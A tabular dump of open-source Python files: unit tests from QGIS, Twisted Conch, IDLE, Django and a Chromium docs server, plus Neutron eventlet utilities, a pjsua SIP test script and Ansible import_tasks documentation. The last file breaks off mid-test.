code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDefaultValue.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Matthias Kuhn'
__date__ = '26.9.2017'
__copyright__ = 'Copyright 2017, The QGIS Project'
import qgis # NOQA
from qgis.core import (QgsDefaultValue)
from qgis.testing import unittest
class TestQgsRasterColorRampShader(unittest.TestCase):
def testValid(self):
self.assertFalse(QgsDefaultValue())
self.assertTrue(QgsDefaultValue('test'))
self.assertTrue(QgsDefaultValue('abc', True))
self.assertTrue(QgsDefaultValue('abc', False))
def setGetExpression(self):
value = QgsDefaultValue('abc', False)
self.assertEqual(value.expression(), 'abc')
value.setExpression('def')
self.assertEqual(value.expression(), 'def')
def setGetApplyOnUpdate(self):
value = QgsDefaultValue('abc', False)
self.assertEqual(value.applyOnUpdate(), False)
value.setApplyOnUpdate(True)
self.assertEqual(value.applyOnUpdate(), True)
if __name__ == '__main__':
unittest.main()
|
pblottiere/QGIS
|
tests/src/python/test_qgsdefaultvalue.py
|
Python
|
gpl-2.0
| 1,300
|
"""Tests for the HomematicIP Cloud component."""
|
fbradyirl/home-assistant
|
tests/components/homematicip_cloud/__init__.py
|
Python
|
apache-2.0
| 49
|
# Copyright (c) 2015 Cloudbase Solutions.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import eventlet
def monkey_patch():
if os.name == 'nt':
# eventlet monkey patching the os and thread modules causes
# subprocess.Popen to fail on Windows when using pipes due
# to missing non-blocking IO support.
#
# bug report on eventlet:
# https://bitbucket.org/eventlet/eventlet/issue/132/
# eventletmonkey_patch-breaks
eventlet.monkey_patch(os=False, thread=False)
else:
eventlet.monkey_patch()
|
Stavitsky/neutron
|
neutron/common/eventlet_utils.py
|
Python
|
apache-2.0
| 1,112
|
# $Id: 201_ice_mismatch_1.py 2392 2008-12-22 18:54:58Z bennylp $
import inc_sip as sip
import inc_sdp as sdp
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=pjmedia
c=IN IP4 127.0.0.1
t=0 0
m=audio 4000 RTP/AVP 0 101
a=ice-ufrag:1234
a=ice-pwd:5678
a=rtpmap:0 PCMU/8000
a=sendrecv
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=candidate:XX 1 UDP 1 1.1.1.1 2222 typ host
"""
args = "--null-audio --use-ice --auto-answer 200 --max-calls 1"
include = ["a=ice-mismatch"]
exclude = []
sendto_cfg = sip.SendtoCfg( "caller sends mismatched offer for comp 1",
pjsua_args=args, sdp=sdp, resp_code=200,
resp_inc=include, resp_exc=exclude)
|
lxki/pjsip
|
tests/pjsua/scripts-sendto/201_ice_mismatch_1.py
|
Python
|
gpl-2.0
| 650
|
# -*- test-case-name: twisted.conch.test.test_recvline -*-
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.recvline} and fixtures for testing related
functionality.
"""
import sys, os
from twisted.conch.insults import insults
from twisted.conch import recvline
from twisted.python import reflect, components
from twisted.internet import defer, error
from twisted.trial import unittest
from twisted.cred import portal
from twisted.test.proto_helpers import StringTransport
class Arrows(unittest.TestCase):
def setUp(self):
self.underlyingTransport = StringTransport()
self.pt = insults.ServerProtocol()
self.p = recvline.HistoricRecvLine()
self.pt.protocolFactory = lambda: self.p
self.pt.factory = self
self.pt.makeConnection(self.underlyingTransport)
# self.p.makeConnection(self.pt)
def testPrintableCharacters(self):
self.p.keystrokeReceived('x', None)
self.p.keystrokeReceived('y', None)
self.p.keystrokeReceived('z', None)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
def testHorizontalArrows(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xy', 'z'))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('x', 'yz'))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('', 'xyz'))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('', 'xyz'))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('x', 'yz'))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xy', 'z'))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
def testNewline(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz\nabc\n123\n':
kR(ch)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
kR('c')
kR('b')
kR('a')
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
kR('\n')
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123', 'cba'), ()))
def testVerticalArrows(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz\nabc\n123\n':
kR(ch)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
self.assertEquals(self.p.currentLineBuffer(), ('', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc'), ('123',)))
self.assertEquals(self.p.currentLineBuffer(), ('123', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz',), ('abc', '123')))
self.assertEquals(self.p.currentLineBuffer(), ('abc', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
((), ('xyz', 'abc', '123')))
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
((), ('xyz', 'abc', '123')))
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
for i in range(4):
kR(self.pt.DOWN_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
def testHome(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'hello, world':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('hello, world', ''))
kR(self.pt.HOME)
self.assertEquals(self.p.currentLineBuffer(), ('', 'hello, world'))
def testEnd(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'hello, world':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('hello, world', ''))
kR(self.pt.HOME)
kR(self.pt.END)
self.assertEquals(self.p.currentLineBuffer(), ('hello, world', ''))
def testBackspace(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.BACKSPACE)
self.assertEquals(self.p.currentLineBuffer(), ('xy', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.BACKSPACE)
self.assertEquals(self.p.currentLineBuffer(), ('', 'y'))
kR(self.pt.BACKSPACE)
self.assertEquals(self.p.currentLineBuffer(), ('', 'y'))
def testDelete(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('xy', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('x', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('', ''))
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('', ''))
def testInsert(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
# kR(self.pt.INSERT)
kR(self.pt.LEFT_ARROW)
kR('A')
self.assertEquals(self.p.currentLineBuffer(), ('xyA', 'z'))
kR(self.pt.LEFT_ARROW)
kR('B')
self.assertEquals(self.p.currentLineBuffer(), ('xyB', 'Az'))
def testTypeover(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
kR(self.pt.INSERT)
kR(self.pt.LEFT_ARROW)
kR('A')
self.assertEquals(self.p.currentLineBuffer(), ('xyA', ''))
kR(self.pt.LEFT_ARROW)
kR('B')
self.assertEquals(self.p.currentLineBuffer(), ('xyB', ''))
from twisted.conch import telnet
from twisted.conch.insults import helper
from twisted.protocols import loopback
class EchoServer(recvline.HistoricRecvLine):
def lineReceived(self, line):
self.terminal.write(line + '\n' + self.ps[self.pn])
# An insults API for this would be nice.
left = "\x1b[D"
right = "\x1b[C"
up = "\x1b[A"
down = "\x1b[B"
insert = "\x1b[2~"
home = "\x1b[1~"
delete = "\x1b[3~"
end = "\x1b[4~"
backspace = "\x7f"
from twisted.cred import checkers
try:
from twisted.conch.ssh import userauth, transport, channel, connection, session
from twisted.conch.manhole_ssh import TerminalUser, TerminalSession, TerminalRealm, TerminalSessionTransport, ConchFactory
except ImportError:
ssh = False
else:
ssh = True
class SessionChannel(channel.SSHChannel):
name = 'session'
def __init__(self, protocolFactory, protocolArgs, protocolKwArgs, width, height, *a, **kw):
channel.SSHChannel.__init__(self, *a, **kw)
self.protocolFactory = protocolFactory
self.protocolArgs = protocolArgs
self.protocolKwArgs = protocolKwArgs
self.width = width
self.height = height
def channelOpen(self, data):
term = session.packRequest_pty_req("vt102", (self.height, self.width, 0, 0), '')
self.conn.sendRequest(self, 'pty-req', term)
self.conn.sendRequest(self, 'shell', '')
self._protocolInstance = self.protocolFactory(*self.protocolArgs, **self.protocolKwArgs)
self._protocolInstance.factory = self
self._protocolInstance.makeConnection(self)
def closed(self):
self._protocolInstance.connectionLost(error.ConnectionDone())
def dataReceived(self, data):
self._protocolInstance.dataReceived(data)
class TestConnection(connection.SSHConnection):
def __init__(self, protocolFactory, protocolArgs, protocolKwArgs, width, height, *a, **kw):
connection.SSHConnection.__init__(self, *a, **kw)
self.protocolFactory = protocolFactory
self.protocolArgs = protocolArgs
self.protocolKwArgs = protocolKwArgs
self.width = width
self.height = height
def serviceStarted(self):
self.__channel = SessionChannel(self.protocolFactory, self.protocolArgs, self.protocolKwArgs, self.width, self.height)
self.openChannel(self.__channel)
def write(self, bytes):
return self.__channel.write(bytes)
class TestAuth(userauth.SSHUserAuthClient):
def __init__(self, username, password, *a, **kw):
userauth.SSHUserAuthClient.__init__(self, username, *a, **kw)
self.password = password
def getPassword(self):
return defer.succeed(self.password)
class TestTransport(transport.SSHClientTransport):
def __init__(self, protocolFactory, protocolArgs, protocolKwArgs, username, password, width, height, *a, **kw):
# transport.SSHClientTransport.__init__(self, *a, **kw)
self.protocolFactory = protocolFactory
self.protocolArgs = protocolArgs
self.protocolKwArgs = protocolKwArgs
self.username = username
self.password = password
self.width = width
self.height = height
def verifyHostKey(self, hostKey, fingerprint):
return defer.succeed(True)
def connectionSecure(self):
self.__connection = TestConnection(self.protocolFactory, self.protocolArgs, self.protocolKwArgs, self.width, self.height)
self.requestService(
TestAuth(self.username, self.password, self.__connection))
def write(self, bytes):
return self.__connection.write(bytes)
class TestSessionTransport(TerminalSessionTransport):
def protocolFactory(self):
return self.avatar.conn.transport.factory.serverProtocol()
class TestSession(TerminalSession):
transportFactory = TestSessionTransport
class TestUser(TerminalUser):
pass
components.registerAdapter(TestSession, TestUser, session.ISession)
class LoopbackRelay(loopback.LoopbackRelay):
clearCall = None
def logPrefix(self):
return "LoopbackRelay(%r)" % (self.target.__class__.__name__,)
def write(self, bytes):
loopback.LoopbackRelay.write(self, bytes)
if self.clearCall is not None:
self.clearCall.cancel()
from twisted.internet import reactor
self.clearCall = reactor.callLater(0, self._clearBuffer)
def _clearBuffer(self):
self.clearCall = None
loopback.LoopbackRelay.clearBuffer(self)
class NotifyingExpectableBuffer(helper.ExpectableBuffer):
def __init__(self):
self.onConnection = defer.Deferred()
self.onDisconnection = defer.Deferred()
def connectionMade(self):
helper.ExpectableBuffer.connectionMade(self)
self.onConnection.callback(self)
def connectionLost(self, reason):
self.onDisconnection.errback(reason)
class _BaseMixin:
WIDTH = 80
HEIGHT = 24
def _assertBuffer(self, lines):
receivedLines = str(self.recvlineClient).splitlines()
expectedLines = lines + ([''] * (self.HEIGHT - len(lines) - 1))
self.assertEquals(len(receivedLines), len(expectedLines))
for i in range(len(receivedLines)):
self.assertEquals(
receivedLines[i], expectedLines[i],
str(receivedLines[max(0, i-1):i+1]) +
" != " +
str(expectedLines[max(0, i-1):i+1]))
def _trivialTest(self, input, output):
done = self.recvlineClient.expect("done")
self._testwrite(input)
def finished(ign):
self._assertBuffer(output)
return done.addCallback(finished)
class _SSHMixin(_BaseMixin):
def setUp(self):
if not ssh:
raise unittest.SkipTest("Crypto requirements missing, can't run historic recvline tests over ssh")
u, p = 'testuser', 'testpass'
rlm = TerminalRealm()
rlm.userFactory = TestUser
rlm.chainedProtocolFactory = lambda: insultsServer
ptl = portal.Portal(
rlm,
[checkers.InMemoryUsernamePasswordDatabaseDontUse(**{u: p})])
sshFactory = ConchFactory(ptl)
sshFactory.serverProtocol = self.serverProtocol
sshFactory.startFactory()
recvlineServer = self.serverProtocol()
insultsServer = insults.ServerProtocol(lambda: recvlineServer)
sshServer = sshFactory.buildProtocol(None)
clientTransport = LoopbackRelay(sshServer)
recvlineClient = NotifyingExpectableBuffer()
insultsClient = insults.ClientProtocol(lambda: recvlineClient)
sshClient = TestTransport(lambda: insultsClient, (), {}, u, p, self.WIDTH, self.HEIGHT)
serverTransport = LoopbackRelay(sshClient)
sshClient.makeConnection(clientTransport)
sshServer.makeConnection(serverTransport)
self.recvlineClient = recvlineClient
self.sshClient = sshClient
self.sshServer = sshServer
self.clientTransport = clientTransport
self.serverTransport = serverTransport
return recvlineClient.onConnection
def _testwrite(self, bytes):
self.sshClient.write(bytes)
from twisted.conch.test import test_telnet
class TestInsultsClientProtocol(insults.ClientProtocol,
test_telnet.TestProtocol):
pass
class TestInsultsServerProtocol(insults.ServerProtocol,
test_telnet.TestProtocol):
pass
class _TelnetMixin(_BaseMixin):
def setUp(self):
recvlineServer = self.serverProtocol()
insultsServer = TestInsultsServerProtocol(lambda: recvlineServer)
telnetServer = telnet.TelnetTransport(lambda: insultsServer)
clientTransport = LoopbackRelay(telnetServer)
recvlineClient = NotifyingExpectableBuffer()
insultsClient = TestInsultsClientProtocol(lambda: recvlineClient)
telnetClient = telnet.TelnetTransport(lambda: insultsClient)
serverTransport = LoopbackRelay(telnetClient)
telnetClient.makeConnection(clientTransport)
telnetServer.makeConnection(serverTransport)
serverTransport.clearBuffer()
clientTransport.clearBuffer()
self.recvlineClient = recvlineClient
self.telnetClient = telnetClient
self.clientTransport = clientTransport
self.serverTransport = serverTransport
return recvlineClient.onConnection
def _testwrite(self, bytes):
self.telnetClient.write(bytes)
try:
from twisted.conch import stdio
except ImportError:
stdio = None
class _StdioMixin(_BaseMixin):
def setUp(self):
# A memory-only terminal emulator, into which the server will
# write things and make other state changes. What ends up
# here is basically what a user would have seen on their
# screen.
testTerminal = NotifyingExpectableBuffer()
# An insults client protocol which will translate bytes
# received from the child process into keystroke commands for
# an ITerminalProtocol.
insultsClient = insults.ClientProtocol(lambda: testTerminal)
# A process protocol which will translate stdout and stderr
# received from the child process to dataReceived calls and
# error reporting on an insults client protocol.
processClient = stdio.TerminalProcessProtocol(insultsClient)
# Run twisted/conch/stdio.py with the name of a class
# implementing ITerminalProtocol. This class will be used to
# handle bytes we send to the child process.
exe = sys.executable
module = stdio.__file__
if module.endswith('.pyc') or module.endswith('.pyo'):
module = module[:-1]
args = [exe, module, reflect.qual(self.serverProtocol)]
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
from twisted.internet import reactor
clientTransport = reactor.spawnProcess(processClient, exe, args,
env=env, usePTY=True)
self.recvlineClient = self.testTerminal = testTerminal
self.processClient = processClient
self.clientTransport = clientTransport
# Wait for the process protocol and test terminal to become
# connected before proceeding. The former should always
# happen first, but it doesn't hurt to be safe.
return defer.gatherResults(filter(None, [
processClient.onConnection,
testTerminal.expect(">>> ")]))
def tearDown(self):
# Kill the child process. We're done with it.
try:
self.clientTransport.signalProcess("KILL")
except (error.ProcessExitedAlready, OSError):
pass
def trap(failure):
failure.trap(error.ProcessTerminated)
self.assertEquals(failure.value.exitCode, None)
self.assertEquals(failure.value.status, 9)
return self.testTerminal.onDisconnection.addErrback(trap)
def _testwrite(self, bytes):
self.clientTransport.write(bytes)
class RecvlineLoopbackMixin:
serverProtocol = EchoServer
def testSimple(self):
return self._trivialTest(
"first line\ndone",
[">>> first line",
"first line",
">>> done"])
def testLeftArrow(self):
return self._trivialTest(
insert + 'first line' + left * 4 + "xxxx\ndone",
[">>> first xxxx",
"first xxxx",
">>> done"])
def testRightArrow(self):
return self._trivialTest(
insert + 'right line' + left * 4 + right * 2 + "xx\ndone",
[">>> right lixx",
"right lixx",
">>> done"])
def testBackspace(self):
return self._trivialTest(
"second line" + backspace * 4 + "xxxx\ndone",
[">>> second xxxx",
"second xxxx",
">>> done"])
def testDelete(self):
return self._trivialTest(
"delete xxxx" + left * 4 + delete * 4 + "line\ndone",
[">>> delete line",
"delete line",
">>> done"])
def testInsert(self):
return self._trivialTest(
"third ine" + left * 3 + "l\ndone",
[">>> third line",
"third line",
">>> done"])
def testTypeover(self):
return self._trivialTest(
"fourth xine" + left * 4 + insert + "l\ndone",
[">>> fourth line",
"fourth line",
">>> done"])
def testHome(self):
return self._trivialTest(
insert + "blah line" + home + "home\ndone",
[">>> home line",
"home line",
">>> done"])
def testEnd(self):
return self._trivialTest(
"end " + left * 4 + end + "line\ndone",
[">>> end line",
"end line",
">>> done"])
class RecvlineLoopbackTelnet(_TelnetMixin, unittest.TestCase, RecvlineLoopbackMixin):
pass
class RecvlineLoopbackSSH(_SSHMixin, unittest.TestCase, RecvlineLoopbackMixin):
pass
class RecvlineLoopbackStdio(_StdioMixin, unittest.TestCase, RecvlineLoopbackMixin):
if stdio is None:
skip = "Terminal requirements missing, can't run recvline tests over stdio"
class HistoricRecvlineLoopbackMixin:
serverProtocol = EchoServer
def testUpArrow(self):
return self._trivialTest(
"first line\n" + up + "\ndone",
[">>> first line",
"first line",
">>> first line",
"first line",
">>> done"])
def testDownArrow(self):
return self._trivialTest(
"first line\nsecond line\n" + up * 2 + down + "\ndone",
[">>> first line",
"first line",
">>> second line",
"second line",
">>> second line",
"second line",
">>> done"])
class HistoricRecvlineLoopbackTelnet(_TelnetMixin, unittest.TestCase, HistoricRecvlineLoopbackMixin):
pass
class HistoricRecvlineLoopbackSSH(_SSHMixin, unittest.TestCase, HistoricRecvlineLoopbackMixin):
pass
class HistoricRecvlineLoopbackStdio(_StdioMixin, unittest.TestCase, HistoricRecvlineLoopbackMixin):
if stdio is None:
skip = "Terminal requirements missing, can't run historic recvline tests over stdio"
|
sorenh/cc
|
vendor/Twisted-10.0.0/twisted/conch/test/test_recvline.py
|
Python
|
apache-2.0
| 21,585
|
'''Unittests for idlelib/SearchDialogBase.py
Coverage: 99%. The only thing not covered is inconsequential --
testing skipping of suite when self.needwrapbutton is false.
'''
import unittest
from test.support import requires
from tkinter import Tk, Toplevel, Frame, Label, BooleanVar, StringVar
from idlelib import SearchEngine as se
from idlelib import SearchDialogBase as sdb
from idlelib.idle_test.mock_idle import Func
from idlelib.idle_test.mock_tk import Var, Mbox
# The following could help make some tests gui-free.
# However, they currently make radiobutton tests fail.
##def setUpModule():
## # Replace tk objects used to initialize se.SearchEngine.
## se.BooleanVar = Var
## se.StringVar = Var
##
##def tearDownModule():
## se.BooleanVar = BooleanVar
## se.StringVar = StringVar
class SearchDialogBaseTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
@classmethod
def tearDownClass(cls):
cls.root.destroy()
del cls.root
def setUp(self):
self.engine = se.SearchEngine(self.root) # None also seems to work
self.dialog = sdb.SearchDialogBase(root=self.root, engine=self.engine)
def tearDown(self):
self.dialog.close()
def test_open_and_close(self):
# open calls create_widgets, which needs default_command
self.dialog.default_command = None
# Since text parameter of .open is not used in base class,
# pass dummy 'text' instead of tk.Text().
self.dialog.open('text')
self.assertEqual(self.dialog.top.state(), 'normal')
self.dialog.close()
self.assertEqual(self.dialog.top.state(), 'withdrawn')
self.dialog.open('text', searchphrase="hello")
self.assertEqual(self.dialog.ent.get(), 'hello')
self.dialog.close()
def test_create_widgets(self):
self.dialog.create_entries = Func()
self.dialog.create_option_buttons = Func()
self.dialog.create_other_buttons = Func()
self.dialog.create_command_buttons = Func()
self.dialog.default_command = None
self.dialog.create_widgets()
self.assertTrue(self.dialog.create_entries.called)
self.assertTrue(self.dialog.create_option_buttons.called)
self.assertTrue(self.dialog.create_other_buttons.called)
self.assertTrue(self.dialog.create_command_buttons.called)
def test_make_entry(self):
equal = self.assertEqual
self.dialog.row = 0
self.dialog.top = Toplevel(self.root)
entry, label = self.dialog.make_entry("Test:", 'hello')
equal(label['text'], 'Test:')
self.assertIn(entry.get(), 'hello')
egi = entry.grid_info()
equal(int(egi['row']), 0)
equal(int(egi['column']), 1)
equal(int(egi['rowspan']), 1)
equal(int(egi['columnspan']), 1)
equal(self.dialog.row, 1)
def test_create_entries(self):
self.dialog.row = 0
self.engine.setpat('hello')
self.dialog.create_entries()
self.assertIn(self.dialog.ent.get(), 'hello')
def test_make_frame(self):
self.dialog.row = 0
self.dialog.top = Toplevel(self.root)
frame, label = self.dialog.make_frame()
self.assertEqual(label, '')
self.assertIsInstance(frame, Frame)
frame, label = self.dialog.make_frame('testlabel')
self.assertEqual(label['text'], 'testlabel')
self.assertIsInstance(frame, Frame)
def btn_test_setup(self, meth):
self.dialog.top = Toplevel(self.root)
self.dialog.row = 0
return meth()
def test_create_option_buttons(self):
e = self.engine
for state in (0, 1):
for var in (e.revar, e.casevar, e.wordvar, e.wrapvar):
var.set(state)
frame, options = self.btn_test_setup(
self.dialog.create_option_buttons)
for spec, button in zip (options, frame.pack_slaves()):
var, label = spec
self.assertEqual(button['text'], label)
self.assertEqual(var.get(), state)
if state == 1:
button.deselect()
else:
button.select()
self.assertEqual(var.get(), 1 - state)
def test_create_other_buttons(self):
for state in (False, True):
var = self.engine.backvar
var.set(state)
frame, others = self.btn_test_setup(
self.dialog.create_other_buttons)
buttons = frame.pack_slaves()
for spec, button in zip(others, buttons):
val, label = spec
self.assertEqual(button['text'], label)
if val == state:
# hit other button, then this one
# indexes depend on button order
self.assertEqual(var.get(), state)
buttons[val].select()
self.assertEqual(var.get(), 1 - state)
buttons[1-val].select()
self.assertEqual(var.get(), state)
def test_make_button(self):
self.dialog.top = Toplevel(self.root)
self.dialog.buttonframe = Frame(self.dialog.top)
btn = self.dialog.make_button('Test', self.dialog.close)
self.assertEqual(btn['text'], 'Test')
def test_create_command_buttons(self):
self.dialog.create_command_buttons()
# Look for close button command in buttonframe
closebuttoncommand = ''
for child in self.dialog.buttonframe.winfo_children():
if child['text'] == 'close':
closebuttoncommand = child['command']
self.assertIn('close', closebuttoncommand)
if __name__ == '__main__':
unittest.main(verbosity=2, exit=2)
|
FireWRT/OpenWrt-Firefly-Libraries
|
staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/idlelib/idle_test/test_searchdialogbase.py
|
Python
|
gpl-2.0
| 5,860
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'
}
DOCUMENTATION = '''
---
author: Ansible Core Team (@ansible)
module: import_tasks
short_description: Import a task list
description:
- Imports a list of tasks to be added to the current playbook for subsequent execution.
version_added: "2.4"
options:
free-form:
description:
- The name of the imported file is specified directly without any other option.
- Most keywords, including loops and conditionals, only applied to the imported tasks, not to this statement
itself. If you need any of those to apply, use M(include_tasks) instead.
notes:
- This is a core feature of Ansible, rather than a module, and cannot be overridden like a module.
'''
EXAMPLES = """
- hosts: all
tasks:
- debug:
msg: task1
- name: Include task list in play
import_tasks: stuff.yaml
- debug:
msg: task10
- hosts: all
tasks:
- debug:
msg: task1
- name: Apply conditional to all imported tasks
import_tasks: stuff.yaml
when: hostvar is defined
"""
RETURN = """
# This module does not return anything except tasks to execute.
"""
|
hryamzik/ansible
|
lib/ansible/modules/utilities/logic/import_tasks.py
|
Python
|
gpl-3.0
| 1,471
|
from django.forms import HiddenInput
from .base import WidgetTest
class HiddenInputTest(WidgetTest):
widget = HiddenInput()
def test_render(self):
self.check_html(self.widget, 'email', '', html='<input type="hidden" name="email" />')
def test_use_required_attribute(self):
# Always False to avoid browser validation on inputs hidden from the
# user.
self.assertIs(self.widget.use_required_attribute(None), False)
self.assertIs(self.widget.use_required_attribute(''), False)
self.assertIs(self.widget.use_required_attribute('foo'), False)
|
edmorley/django
|
tests/forms_tests/widget_tests/test_hiddeninput.py
|
Python
|
bsd-3-clause
| 603
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from copy import deepcopy
import unittest
from host_file_system_provider import HostFileSystemProvider
from host_file_system_iterator import HostFileSystemIterator
from object_store_creator import ObjectStoreCreator
from test_branch_utility import TestBranchUtility
from test_data.canned_data import CANNED_API_FILE_SYSTEM_DATA
from test_file_system import TestFileSystem
def _GetIterationTracker(version):
'''Adds the ChannelInfo object from each iteration to a list, and signals the
loop to stop when |version| is reached.
'''
iterations = []
def callback(file_system, channel_info):
if channel_info.version == version:
return False
iterations.append(channel_info)
return True
return (iterations, callback)
class HostFileSystemIteratorTest(unittest.TestCase):
def setUp(self):
def host_file_system_constructor(branch, **optargs):
return TestFileSystem(deepcopy(CANNED_API_FILE_SYSTEM_DATA[branch]))
host_file_system_provider = HostFileSystemProvider(
ObjectStoreCreator.ForTest(),
constructor_for_test=host_file_system_constructor)
self._branch_utility = TestBranchUtility.CreateWithCannedData()
self._iterator = HostFileSystemIterator(
host_file_system_provider,
self._branch_utility)
def _GetStableChannelInfo(self,version):
return self._branch_utility.GetStableChannelInfo(version)
def _GetChannelInfo(self, channel_name):
return self._branch_utility.GetChannelInfo(channel_name)
def testAscending(self):
# Start at |stable| version 5, and move up towards |master|.
# Total: 28 file systems.
iterations, callback = _GetIterationTracker(0)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
self._GetChannelInfo('master'))
self.assertEqual(len(iterations), 28)
# Start at |stable| version 5, and move up towards |master|. The callback
# fails at |beta|, so the last successful callback was the latest version
# of |stable|. Total: 25 file systems.
iterations, callback = _GetIterationTracker(
self._GetChannelInfo('beta').version)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
self._GetChannelInfo('stable'))
self.assertEqual(len(iterations), 25)
# Start at |stable| version 5, and the callback fails immediately. Since
# no file systems are successfully processed, expect a return of None.
iterations, callback = _GetIterationTracker(5)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
None)
self.assertEqual([], iterations)
# Start at |stable| version 5, and the callback fails at version 6.
# The return should represent |stable| version 5.
iterations, callback = _GetIterationTracker(6)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
self._GetStableChannelInfo(5))
self.assertEqual([self._GetStableChannelInfo(5)], iterations)
# Start at the latest version of |stable|, and the callback fails at
# |master|. Total: 3 file systems.
iterations, callback = _GetIterationTracker('master')
self.assertEqual(
self._iterator.Ascending(self._GetChannelInfo('stable'), callback),
self._GetChannelInfo('dev'))
self.assertEqual([self._GetChannelInfo('stable'),
self._GetChannelInfo('beta'),
self._GetChannelInfo('dev')], iterations)
# Start at |stable| version 10, and the callback fails at |master|.
iterations, callback = _GetIterationTracker('master')
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(10), callback),
self._GetChannelInfo('dev'))
self.assertEqual([self._GetStableChannelInfo(10),
self._GetStableChannelInfo(11),
self._GetStableChannelInfo(12),
self._GetStableChannelInfo(13),
self._GetStableChannelInfo(14),
self._GetStableChannelInfo(15),
self._GetStableChannelInfo(16),
self._GetStableChannelInfo(17),
self._GetStableChannelInfo(18),
self._GetStableChannelInfo(19),
self._GetStableChannelInfo(20),
self._GetStableChannelInfo(21),
self._GetStableChannelInfo(22),
self._GetStableChannelInfo(23),
self._GetStableChannelInfo(24),
self._GetStableChannelInfo(25),
self._GetStableChannelInfo(26),
self._GetStableChannelInfo(27),
